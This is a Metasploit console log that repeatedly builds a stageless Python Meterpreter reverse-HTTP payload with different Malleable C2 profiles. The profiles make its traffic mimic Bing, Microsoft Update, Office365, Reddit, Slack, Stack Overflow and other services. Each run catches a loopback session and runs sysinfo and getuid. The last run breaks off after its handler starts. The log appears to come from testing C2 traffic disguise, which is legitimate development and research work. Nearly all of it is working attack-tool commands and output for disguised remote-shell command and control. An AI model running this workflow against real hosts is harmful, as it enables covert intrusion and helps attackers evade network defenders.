[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 4le0m8k9) Redirecting stageless: URI '/maps/overlaybfpr' with UA 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36' -> UUID dRnh41wXxB6HDpIa7SVAvwp0cYnkIREIM8NYB6u_niPJZD1IXPLTreyJj-p4J14yD_PVJg5Bxq6EcQV5xJTq4zhSxaa8UqkoXb1B1uq
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 4le0m8k9) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 4le0m8k9) Attaching orphaned/stageless session...
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 4le0m8k9) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.py is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:49616) at 2026-06-12 10:47:47 +0200

msf payload(python/meterpreter_reverse_http) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux 7.0.11-1-cachyos #1 SMP PREEMPT_DYNAMIC Wed, 03 Jun 2026 22:05:15 +0000
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: ms

bingsearch_getonly

resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> use payload/python/meterpreter_reverse_http
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/bingsearch_getonly.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/bingsearch_getonly.profile
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> generate -f raw -o /tmp/msf.py
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Writing 30792 bytes to /tmp/msf.py...
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Payload Handler Started as Job 0
msf payload(python/meterpreter_reverse_http) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started HTTP reverse handler on http://127.0.0.1:4242
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: yow6r5xq) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: yow6r5xq) Redirecting stageless: URI '/search/' with UA 'Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko' -> UUID 1OLkf8naTzobYQ51cUrTRwaOMd5E3oSvaXt79c3hdtkkzujHbw_10kC-n3Zvm2U5AkXa0e2u7VOhgIKoGRCFpp9
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: yow6r5xq) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: yow6r5xq) Attaching orphaned/stageless session...
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: yow6r5xq) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.py is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:36890) at 2026-06-12 10:49:44 +0200

msf payload(python/meterpreter_reverse_http) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux 7.0.11-1-cachyos #1 SMP PREEMPT_DYNAMIC Wed, 03 Jun 2026 22:05:15 +0000
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: ms

microsoft_update_getonly

resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> use payload/python/meterpreter_reverse_http
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/microsoftupdate_getonly.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/microsoftupdate_getonly.profile
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> generate -f raw -o /tmp/msf.py
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Writing 30404 bytes to /tmp/msf.py...
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Payload Handler Started as Job 0

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
msf payload(python/meterpreter_reverse_http) > [*] Started HTTP reverse handler on http://127.0.0.1:4242

msf payload(python/meterpreter_reverse_http) > sessions 
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: o51s4teb) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: o51s4teb) Redirecting stageless: URI '/c/msdownload/update/others/2016/12/29136388_/NlItTnNWNlpHNkwwc2VHbG5wbzh3UThSS3o4Y0g.cab' with UA 'Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40' -> UUID 6R-NsV6ZG6L0seGlnpo8TwurkJTTWcrPtYMJljqKQK6GuYgk2mLpSTbxOQjRAH6x_dXDtdC59qOaSHA36AV7OxACpzyHmyNo_VJdBd87Z5w6JMljSzIqM0z
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: o51s4teb) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: o51s4teb) Attaching orphaned/stageless session...
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: o51s4teb) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.py is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:57276) at 2026-06-12 10:53:20 +0200


Active sessions
===============

  Id  Name  Type                      Information         Connection
  --  ----  ----                      -----------         ----------
  1         meterpreter python/linux  ms @ cachyos-x8664  127.0.0.1:4242 -> 127.0.0.1:57276 (127.0.0.1)

msf payload(python/meterpreter_reverse_http) > sessions  -1
[*] Starting interaction with 1...

meterpreter > sysinfo
getuidComputer        : cachyos-x8664
OS              : Linux 7.0.11-1-cachyos #1 SMP PREEMPT_DYNAMIC Wed, 03 Jun 2026 22:05:15 +0000
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: ms

mscrl

resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> use payload/python/meterpreter_reverse_http
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/mscrl.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/mscrl.profile
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> generate -f raw -o /tmp/msf.py
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Writing 30660 bytes to /tmp/msf.py...
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Payload Handler Started as Job 0
msf payload(python/meterpreter_reverse_http) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started HTTP reverse handler on http://127.0.0.1:4242
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: mp1c6w8r) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: mp1c6w8r) Redirecting stageless: URI '/pki/mscorp/cps/default.htm' with UA 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36' -> UUID xSTsCLLnX5ekuLGszpNodgp9TKaZtSRh9aUtfPEGR_Gm05CkStkDJ2x-r3MTZvL0qZZZk3-xsE-fvy5B
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: mp1c6w8r) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: mp1c6w8r) Attaching orphaned/stageless session...
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: mp1c6w8r) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.py is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:51172) at 2026-06-12 11:09:36 +0200

msf payload(python/meterpreter_reverse_http) > sessions  -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux 7.0.11-1-cachyos #1 SMP PREEMPT_DYNAMIC Wed, 03 Jun 2026 22:05:15 +0000
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: ms

msnbc_video

resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> use payload/python/meterpreter_reverse_http
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/msnbcvideo_getonly.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/msnbcvideo_getonly.profile
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> generate -f raw -o /tmp/msf.py
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Writing 30796 bytes to /tmp/msf.py...
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Payload Handler Started as Job 0

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
msf payload(python/meterpreter_reverse_http) > [*] Started HTTP reverse handler on http://127.0.0.1:4242
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: j5b4udrn) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: j5b4udrn) Redirecting stageless: URI '/z/msnbc2_live01@9615/manifest.f4m' with UA 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko' -> UUID dZAkvMnVkksKWx9PYHDFngRDwYu06c_sskQUODja-
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: j5b4udrn) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: j5b4udrn) Attaching orphaned/stageless session...
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: j5b4udrn) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.py is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:57974) at 2026-06-12 11:22:18 +0200

msf payload(python/meterpreter_reverse_http) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
getuid
Computer        : cachyos-x8664
OS              : Linux 7.0.11-1-cachyos #1 SMP PREEMPT_DYNAMIC Wed, 03 Jun 2026 22:05:15 +0000
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: ms

office365_calendar

resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> use payload/python/meterpreter_reverse_http
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/office365_calendar.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/office365_calendar.profile
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> generate -f raw -o /tmp/msf.py
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Writing 30660 bytes to /tmp/msf.py...
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Payload Handler Started as Job 0

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
msf payload(python/meterpreter_reverse_http) > [*] Started HTTP reverse handler on http://127.0.0.1:4242
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: bl3dg807) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: bl3dg807) Redirecting stageless: URI '/owa/' with UA 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko)' -> UUID fKKjsmM19_F_HGoIFTevlgAKscy4UsTPhi-C8G7A5PcxDn95j5
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: bl3dg807) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: bl3dg807) Attaching orphaned/stageless session...
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: bl3dg807) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.py is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:54644) at 2026-06-12 11:25:32 +0200

msf payload(python/meterpreter_reverse_http) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux 7.0.11-1-cachyos #1 SMP PREEMPT_DYNAMIC Wed, 03 Jun 2026 22:05:15 +0000
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: ms

oscp

resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> use payload/python/meterpreter_reverse_http
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/oscp.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/oscp.profile
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> generate -f raw -o /tmp/msf.py
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Writing 30176 bytes to /tmp/msf.py...
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Payload Handler Started as Job 0
msf payload(python/meterpreter_reverse_http) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started HTTP reverse handler on http://127.0.0.1:4242
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: e0nitmg5) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: e0nitmg5) Redirecting stageless: URI '/oscp/mDoziDednooziyafWaDjdA0ouousj' with UA 'Microsoft-CryptoAPI/6.1' -> UUID mDoziDednooziyafWaDigg7lWl6j68V76cuNm2gYbWyglr0ni2UgcIvCpzY77Av5kgSRVicX3b
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: e0nitmg5) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: e0nitmg5) Attaching orphaned/stageless session...
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: e0nitmg5) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.py is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:43856) at 2026-06-12 11:27:39 +0200

msf payload(python/meterpreter_reverse_http) > sessions  -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux 7.0.11-1-cachyos #1 SMP PREEMPT_DYNAMIC Wed, 03 Jun 2026 22:05:15 +0000
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: ms

Reddit

resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> use payload/python/meterpreter_reverse_http
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/reddit.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/reddit.profile
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> generate -f raw -o /tmp/msf.py
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Writing 30788 bytes to /tmp/msf.py...
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Payload Handler Started as Job 0

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
msf payload(python/meterpreter_reverse_http) > [*] Started HTTP reverse handler on http://127.0.0.1:4242
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: u68l59jn) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: u68l59jn) Redirecting stageless: URI '/r/webdev/comments/95ltyr' with UA 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36' -> UUID h_rpiqw62Xn17uD6n8UkQgHqFd4nj4oxzloxVfT_rcvAVGuUNHSSj6YzkL2wbtXNu8qdaIw-nC
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: u68l59jn) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: u68l59jn) Attaching orphaned/stageless session...
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: u68l59jn) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.py is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:54638) at 2026-06-12 11:30:22 +0200

msf payload(python/meterpreter_reverse_http) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux 7.0.11-1-cachyos #1 SMP PREEMPT_DYNAMIC Wed, 03 Jun 2026 22:05:15 +0000
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: ms

rmtp

resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> use payload/python/meterpreter_reverse_http
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/rtmp.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/rtmp.profile
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> generate -f raw -o /tmp/msf.py
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Writing 30404 bytes to /tmp/msf.py...
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Payload Handler Started as Job 0

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
msf payload(python/meterpreter_reverse_http) > [*] Started HTTP reverse handler on http://127.0.0.1:4242
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: w147lgst) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: w147lgst) Redirecting stageless: URI '/idle/1376547834/1' with UA 'Shockwave Flash' -> UUID 95na2CDPIiKkGLEMzjN3fgZEKVmQasDGKEzGzjAoCPO9
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: w147lgst) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: w147lgst) Attaching orphaned/stageless session...
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: w147lgst) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.py is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:37806) at 2026-06-12 11:37:47 +0200

msf payload(python/meterpreter_reverse_http) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux 7.0.11-1-cachyos #1 SMP PREEMPT_DYNAMIC Wed, 03 Jun 2026 22:05:15 +0000
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: ms

Slack

resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> use payload/python/meterpreter_reverse_http
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/slack.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/slack.profile
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> generate -f raw -o /tmp/msf.py
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Writing 30664 bytes to /tmp/msf.py...
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Payload Handler Started as Job 0

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
msf payload(python/meterpreter_reverse_http) > [*] Started HTTP reverse handler on http://127.0.0.1:4242
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 9d8b1ret) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 9d8b1ret) Redirecting stageless: URI '/messages/C0527B0NM' with UA 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko)' -> UUID 0X47lDFu-dPiDvcaiCU2cQkbabmTruM1rWKMpopaSGqUBtuEDnLH2F
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 9d8b1ret) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 9d8b1ret) Attaching orphaned/stageless session...
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 9d8b1ret) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.py is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:51598) at 2026-06-12 11:42:25 +0200

msf payload(python/meterpreter_reverse_http) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux 7.0.11-1-cachyos #1 SMP PREEMPT_DYNAMIC Wed, 03 Jun 2026 22:05:15 +0000
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: ms

Stackoverflow

resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> use payload/python/meterpreter_reverse_http
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/stackoverflow.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/stackoverflow.profile
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> generate -f raw -o /tmp/msf.py
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Writing 30744 bytes to /tmp/msf.py...
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Payload Handler Started as Job 0

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
msf payload(python/meterpreter_reverse_http) > [*] Started HTTP reverse handler on http://127.0.0.1:4242
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: qagiy8zc) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: qagiy8zc) Redirecting stageless: URI '/questions/32251816/c-sharp-directives-compilation-error' with UA 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36' -> UUID 6tYFbcrTj77lN_Ajjxwylg8cB9XTFQVFppV4A22TVhVPtQX-kFyUn4QRJ9
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: qagiy8zc) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: qagiy8zc) Attaching orphaned/stageless session...
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: qagiy8zc) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.py is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:56026) at 2026-06-12 11:55:50 +0200

msf payload(python/meterpreter_reverse_http) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux 7.0.11-1-cachyos #1 SMP PREEMPT_DYNAMIC Wed, 03 Jun 2026 22:05:15 +0000
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: ms

Trevor

resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> use payload/python/meterpreter_reverse_http
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/trevor.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/trevor.profile
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> generate -f raw -o /tmp/msf.py
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Writing 30636 bytes to /tmp/msf.py...
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> to_handler
^[[1;4CWARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Payload Handler Started as Job 0

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
